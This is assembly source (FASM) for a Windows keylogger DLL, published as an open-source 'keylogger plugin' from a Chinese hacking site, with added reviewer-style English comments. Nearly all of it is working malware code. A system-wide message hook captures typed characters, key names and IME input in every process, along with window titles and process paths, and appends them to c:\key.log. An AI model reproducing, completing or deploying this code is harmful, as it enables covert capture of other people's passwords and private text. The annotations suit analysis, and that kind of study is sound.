;////////////////////////////////////////////////////////
; 黑客防线开源键盘记录插件Beta1.0
; 作者:小鱼
; 黑客防线 http://www.hacker.com.cn
;//////////////////////////////////////////////////////
; FASM source. Output: a 32-bit Windows GUI-subsystem DLL whose entry point
; is DllEntry. win32ax.inc supplies the proc/invoke/stdcall macros and the
; Win32 constants used below.
format PE GUI 4.0 DLL
entry DllEntry
include 'win32ax.inc'
; Locally defined constants: the IME composition notification message id,
; the ImmGetCompositionString flag selecting the committed result string,
; and KeyMaxSize, which nothing in this file reads.
WM_IME_COMPOSITION equ 010Fh
GCS_RESULTSTR equ 0800h
KeyMaxSize equ 128
; Per-process writable data (a separate copy in every process this DLL is
; loaded into; contrast with the shareable section below).
section '.data' data readable writeable
; wsprintf format of the header SaveInfo writes when the foreground window
; changes: CRLF, "[MM/DD/YYYY hh:mm:ss] (<window title>----<process path>) ---", CRLF.
szString db 0dh, 0ah, ' [%02d/%02d/%d %02d:%02d:%02d] (%s----%s) --- ',0dh, 0ah,0
szEnter db 0dh,0ah,0                   ; logged in place of a carriage-return (0Dh) character
szKeyTemp db '[%s]',0                  ; wraps a GetKeyNameText result
szKeyName db 30 dup (?)                ; GetKeyNameText output (HookProc asks for at most 28 chars)
szKeyBuffer db 36 dup (?)              ; wsprintf output of szKeyTemp
hFocus rd 1                            ; HWND with keyboard focus during IME handling
dwStrSize rd 1                         ; size reported by ImmGetCompositionString, plus 2
; Writable AND shareable: a single copy of these variables is mapped into
; every process the hook DLL gets loaded into, so the hook handle, the
; cached foreground window and the last-message timestamp are global across
; processes. Despite the section name it also carries initialised data
; (szTemp). A writable+shareable section in a hook DLL is itself a
; noteworthy static characteristic for reviewers.
section '.bss' data readable writeable shareable
hInstance rd 1                         ; this DLL's module handle, set in DllEntry
hHook rd 1                             ; handle from SetWindowsHookEx; 0 when not installed
hImc rd 1                              ; IME input context during IME handling
hWindow rd 1                           ; not referenced elsewhere in this file
hParent rd 1                           ; last foreground window seen by SaveInfo
dwLastTime rd 1                        ; MSG.time of the last logged message (duplicate suppression)
szTemp db 'c:\key.log', 0              ; log file path: the on-disk artifact this DLL produces
szTitle db 50 dup (?)                  ; not referenced elsewhere in this file (SaveInfo uses a local)
szChar db 2 dup (?)                    ; one logged character + NUL (HookProc stores a DWORD here)
szShare db 200 dup (?)                 ; IME result string buffer
section '.text' code readable executable
;-----------------------------------------------------------------------
; BOOL WINAPI DllEntry(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpReserved)
; DLL entry point. Copies hInstDLL (first argument, read as [ebp+8]) into
; the shared global hInstance, which StartHook passes to SetWindowsHookEx,
; and returns TRUE. dwReason is not examined, so the store is repeated on
; every attach/detach notification.
;-----------------------------------------------------------------------
proc DllEntry hInstDLL, dwReason, lpReserved
push dword [ebp+8]                     ; hInstance = hInstDLL
pop dword [hInstance]
sub eax, eax                           ; eax = 0 ...
inc eax                                ; ... then 1 -> return TRUE
ret
endp
;-----------------------------------------------------------------------
; BOOL FileExist(LPCSTR lpPath)
; Returns 1 when GetFileAttributes(lpPath) succeeds and 0 when it returns
; INVALID_FILE_ATTRIBUTES (0FFFFFFFFh). "Missing" and "inaccessible" are
; not told apart; GetLastError is not consulted.
;-----------------------------------------------------------------------
proc FileExist lpPath:DWORD
invoke GetFileAttributes, [lpPath]
cmp eax, 0FFFFFFFFh                    ; INVALID_FILE_ATTRIBUTES
je RetFaild
return 1
RetFaild:                              ; (sic) file-scope label, referenced only above
return 0
endp
;-----------------------------------------------------------------------
; BOOL SaveInfo(LPCSTR lpBuffer)
; Appends lpBuffer to the log through SaveToFile. When the foreground
; window differs from the cached hParent, it first writes a header line
; (local time, window caption, image path of the owning process) by
; formatting it into @szBuffer and calling SaveInfo recursively; the inner
; call normally finds hParent already updated and only performs the write.
; In:    lpBuffer = NUL-terminated text to append
; Out:   eax = TRUE on success, FALSE after a failure (a MessageBox is shown)
; Side effects: updates hParent (shared section); opens/creates the log
;        file via SaveToFile; shows a MessageBox inside the hooked process
;        on failure, a visible artifact when the process cannot query the
;        foreground process or write the log.
; Stack: about 1.4 KB of locals per level.
;-----------------------------------------------------------------------
proc SaveInfo lpBuffer:DWORD
locals
SysTime SYSTEMTIME
dwProcessId dd ?
hProcess dd ?
@ProcessPath db 200 dup (?)            ; image path of the foreground process
@szTitle db 200 dup (?)                ; foreground window caption
@szBuffer db 1000 dup (?)              ; formatted header line
endl
invoke GetActiveWindow
cmp [hParent], eax                     ; same foreground window as last time?
je @f                                  ; yes -> skip the header, just write lpBuffer
mov [hParent], eax
invoke GetWindowText, eax, addr @szTitle, 200
xor eax, eax
mov [dwProcessId], eax
invoke GetWindowThreadProcessId, [hParent], addr dwProcessId
invoke OpenProcess, PROCESS_QUERY_INFORMATION or PROCESS_VM_READ, FALSE, [dwProcessId]
or eax, eax
je @@3                                 ; OpenProcess failed (e.g. access denied)
mov [hProcess], eax
invoke GetModuleFileNameEx, [hProcess], NULL, addr @ProcessPath, 200
or eax, eax
je @@3
; hProcess is not closed anywhere in this proc.
invoke GetLocalTime, addr SysTime
invoke RtlZeroMemory, addr @szBuffer, 1000
; w2d is not defined in this file -- presumably widens the WORD fields to a
; DWORD for the vararg push; confirm in the includes. wsprintf is cdecl and
; its arguments are not popped here; the proc epilogue restores esp from ebp.
invoke wsprintf, addr @szBuffer, szString, w2d [SysTime.wMonth], \
w2d [SysTime.wDay], w2d [SysTime.wYear], w2d [SysTime.wHour],\
w2d [SysTime.wMinute], w2d [SysTime.wSecond], addr @szTitle, addr @ProcessPath
; Recursive call writes the header: hParent now matches, so the inner call
; takes the @@ path below.
stdcall SaveInfo, addr @szBuffer
@@:
stdcall SaveToFile, dword [ebp+8]      ; [ebp+8] = lpBuffer
or eax, eax
; NOTE(review): no further `@@:` appears in this proc, so `@f` binds to the
; next anonymous label in the file, outside SaveInfo -- confirm the intended
; failure target.
je @f
return TRUE
@@3:                                   ; named label (not anonymous): process query failed
invoke MessageBox, NULL, '查询进程信息失败..', '提示', MB_OK
@@0:                                   ; unreferenced
return FALSE
endp
;
;
;
;-----------------------------------------------------------------------
; BOOL SaveToFile(LPCSTR lpBuffer)
; Appends the NUL-terminated string at lpBuffer to the file named by szTemp
; ('c:\key.log'). Creates it (CREATE_ALWAYS) when FileExist reports it
; absent, otherwise opens it (OPEN_ALWAYS); seeks to the end, writes
; lstrlen bytes and closes. The file is opened and closed on every call,
; with FILE_SHARE_WRITE as the only share mode.
; Out:   eax = TRUE on success; FALSE after a CreateFile or WriteFile
;        failure, each preceded by a MessageBox.
; On the WriteFile failure path the handle is not closed.
;-----------------------------------------------------------------------
proc SaveToFile lpBuffer:DWORD
locals
@hFile dd ?
@lpByteWrite dd ?                      ; bytes-written output of WriteFile; never read
@dwFileSize dd ?                       ; length of lpBuffer, not a file size
endl
stdcall FileExist, szTemp
or eax, eax
jne @f                                 ; exists -> OPEN_ALWAYS path
invoke CreateFile, szTemp, GENERIC_WRITE, FILE_SHARE_WRITE, NULL,\
CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
cmp eax, -1                            ; INVALID_HANDLE_VALUE
je @@2
mov [@hFile], eax
jmp @@1
@@:
invoke CreateFile, szTemp, GENERIC_WRITE, FILE_SHARE_WRITE, NULL,\
OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
cmp eax, -1                            ; INVALID_HANDLE_VALUE
je @@2
mov [@hFile], eax
@@1:
xor eax, eax
mov dword [@dwFileSize], eax
invoke lstrlen, [lpBuffer]
mov [@dwFileSize], eax                 ; byte count to write (terminating NUL excluded)
invoke SetFilePointer, [@hFile], 0, 0, FILE_END   ; append
invoke WriteFile, [@hFile], [lpBuffer], [@dwFileSize], addr @lpByteWrite, NULL
or eax, eax
je @f                                  ; write failed -> message; @hFile stays open
invoke CloseHandle, [@hFile]
RetTrue:                               ; unreferenced
return TRUE
@@2:                                   ; named label (not anonymous): CreateFile failed
invoke MessageBox, NULL, '创建失败...', '提示', MB_OK
return FALSE
@@:
invoke MessageBox, NULL, '写入失败...', '提示', MB_OK
return FALSE
endp
;
; CALLBACK HookProc
;
;-----------------------------------------------------------------------
; LRESULT CALLBACK HookProc(int dwCode, WPARAM wParam, LPARAM lParam)
; WH_GETMESSAGE hook procedure installed by StartHook; it therefore runs
; inside every process and thread the hook reaches. It first forwards to
; CallNextHookEx and keeps that result, then reads the MSG structure that
; lParam points to and logs through SaveInfo:
;   WM_CHAR            -> the character itself when 14h <= wParam <= 80h
;                         (signed compares), szEnter for 0Dh, otherwise
;                         "[<key name>]" from GetKeyNameText
;   WM_IME_COMPOSITION -> the committed IME result string (GCS_RESULTSTR)
; Duplicate delivery is suppressed only by comparing MSG.time with the
; shared dwLastTime; dwCode is not compared with HC_ACTION and wParam
; (the PM_REMOVE/PM_NOREMOVE flag) is not examined.
; Out:   eax = CallNextHookEx result
; Preserves edx, esi, edi explicitly (push/pop around the body).
;-----------------------------------------------------------------------
proc HookProc dwCode:DWORD, wParam:DWORD, lParam:DWORD
locals
dwResult dd ?                          ; CallNextHookEx return value
dwlParam dd ?                          ; MSG.lParam, handed to GetKeyNameText
endl
push edx esi edi
invoke CallNextHookEx, [hHook], [dwCode], [wParam], [lParam]
mov dword [dwResult], eax
mov edx, [lParam]                      ; edx = MSG*
; Overlay of the MSG structure at edx: hwnd, message, wParam, lParam, time, pt.
virtual at edx
@hWnd dd ?
@MSG dd ?
@wParam dd ?
@lParam dd ?
@dwTime dd ?
@dwpt dd ?
end virtual
push dword [@lParam]
pop dword [dwlParam]
cmp [@MSG], WM_CHAR
je __HookChar
cmp [@MSG], WM_IME_COMPOSITION
je __HookImeChar
jmp __HookEnd
__HookChar:
mov eax, dword [@dwTime]               ; same MSG.time as the last logged message -> duplicate
cmp [dwLastTime], eax
je __HookEnd
push [@dwTime]
pop [dwLastTime]
cmp [@wParam], 80h                     ; signed compares: 14h <= wParam <= 80h is logged as a character
jg @f
cmp [@wParam], 14h
jl @f
xor eax, eax
mov dword [szChar], eax
; DWORD store into the 2-byte szChar: bytes 2..3 land in szShare[0..1]
; (zero here, since wParam <= 80h), which supplies the NUL for SaveInfo.
push dword [@wParam]
pop dword [szChar]
stdcall SaveInfo, szChar
jmp __HookEnd
@@:
cmp [@wParam], 0dh                     ; carriage return -> log CRLF
jne @f
stdcall SaveInfo, szEnter
jmp __HookEnd
@@:
_SaveKeyName:                          ; control / out-of-range characters: log the key name
invoke RtlZeroMemory, szKeyName, 30
invoke GetKeyNameText,[dwlParam], szKeyName, 28
cmp eax, 0
jle __HookEnd                          ; no name available -> nothing logged
invoke RtlZeroMemory, szKeyBuffer, 36
invoke wsprintf, szKeyBuffer, szKeyTemp, szKeyName
add esp, 3*4                           ; wsprintf is cdecl: pop its three arguments
stdcall SaveInfo, szKeyBuffer
jmp __HookEnd
__HookImeChar:
mov eax, dword [@dwTime]               ; duplicate suppression via MSG.time, as for WM_CHAR
cmp [dwLastTime], eax
je __HookEnd
push [@dwTime]
pop [dwLastTime]
invoke GetFocus
mov [hFocus], eax
invoke ImmGetContext, [hFocus]
or eax, eax
je __HookEnd                           ; no input context for the focused window
mov [hImc], eax
invoke ImmGetCompositionString, [hImc], GCS_RESULTSTR, 0, 0   ; size query
or eax, eax
je __HookEnd                           ; only 0 is treated as failure; negative IMM error codes fall through
mov [dwStrSize], eax
inc [dwStrSize]                        ; +2, presumably room for a terminator
inc [dwStrSize]
invoke RtlZeroMemory, szShare, 200
; szShare is 200 bytes; dwStrSize is passed as the buffer length without being clamped.
invoke ImmGetCompositionString, [hImc], GCS_RESULTSTR, szShare, [dwStrSize]
stdcall SaveInfo, szShare
invoke ImmReleaseContext, [hFocus], [hImc]
xor eax, eax
mov [hImc], eax
mov [hFocus], eax
__HookEnd:
pop edi esi edx
return [dwResult]
endp
;
; InstallHook Proc
;
;-----------------------------------------------------------------------
; void StartHook(void)                                        (exported)
; Installs HookProc as a WH_GETMESSAGE hook with thread id NULL, i.e. for
; all threads on the calling desktop; per the SetWindowsHookEx contract
; the system then maps this DLL into every such process. hHook lives in
; the shareable section, so the "already installed" check holds across
; processes. The SetWindowsHookEx result is stored unchecked: 0 on
; failure simply lets a later call retry.
; Out:   eax = hook handle after installation; unspecified on the
;        early-return path.
;-----------------------------------------------------------------------
proc StartHook
cmp [hHook], 0 ; already installed -> do nothing
je @f
return
@@:
invoke SetWindowsHookEx, WH_GETMESSAGE, HookProc,\
[hInstance], NULL
mov [hHook], eax
return
endp
;
; UnInstallHook Proc
;
;-----------------------------------------------------------------------
; void StopHook(void)                                         (exported)
; Removes the hook and clears the shared hHook. UnhookWindowsHookEx's
; result is discarded, and the call is made even when hHook is already 0.
; Out:   eax = 0
;-----------------------------------------------------------------------
proc StopHook
invoke UnhookWindowsHookEx, [hHook]
xor eax, eax
mov [hHook], eax
return
endp
; Import table. user32/kernel32 come from the FASM API include files;
; imm32 and Psapi are declared by hand, binding the ANSI variants.
section '.idata' data readable writeable import
library user32, 'user32.dll',\
kernel32, 'kernel32.dll',\
imm32, 'imm32.dll',\
Psapi, 'Psapi.dll'
include 'api\kernel32.inc'
include 'api\user32.inc'
import imm32,\
ImmGetContext, 'ImmGetContext',\
ImmReleaseContext, 'ImmReleaseContext',\
ImmGetCompositionString, 'ImmGetCompositionStringA'
import Psapi,\
GetModuleFileNameEx, 'GetModuleFileNameExA'
; Export table: the two entry points a caller uses to install and remove the hook.
section '.rdata' data readable writeable export
export 'hook.dll',\
StartHook, 'StartHook',\
StopHook, 'StopHook'
; Base relocations, so the DLL can be mapped at a different address in each host process.
section '.reloc' data readable fixups